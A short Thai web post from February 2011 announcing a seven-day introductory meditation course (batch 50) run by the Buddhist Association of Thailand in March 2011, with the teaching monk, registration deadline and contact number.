พุทธสมาคมแห่งประเทศไทยฯ เชิญอบรมกรรมฐาน

 pookmainz    22 ก.พ. 2554

พุทธสมาคมแห่งประเทศไทย ในพระบรมราชูปถัมภ์ ขอเชิญผู้สนใจอบรมกรรมฐานเบื้องต้น หลักสูตร ๗ วัน (ไป-กลับ) รุ่นที่ ๕๐ ระหว่างวันจันทร์ที่ ๗ ถึงวันอาทิตย์ที่ ๑๓ มีนาคม ๒๕๕๔ ณ หอประชุมพุทธสมาคมฯ

พระสาสนโสภณ (พิจิตร ฐิตวัณโณ) เจ้าอาวาสวัดโสมนัสราชวรวิหาร เป็นพระอาจารย์ผู้อำนวยการอบรม

รับสมัครตั้งแต่บัดนี้จนถึงวันที่ ๕ มีนาคม ๒๕๕๔ ผู้ที่สนใจโปรดติดต่อสอบถามรายละเอียดได้ที่ฝ่ายธุรการ โทร.๐๒-๒๘๑-๙๕๖๓ - ๔ กด ๑๒๒
 https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   
  3,612 

  แสดงความคิดเห็น


RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย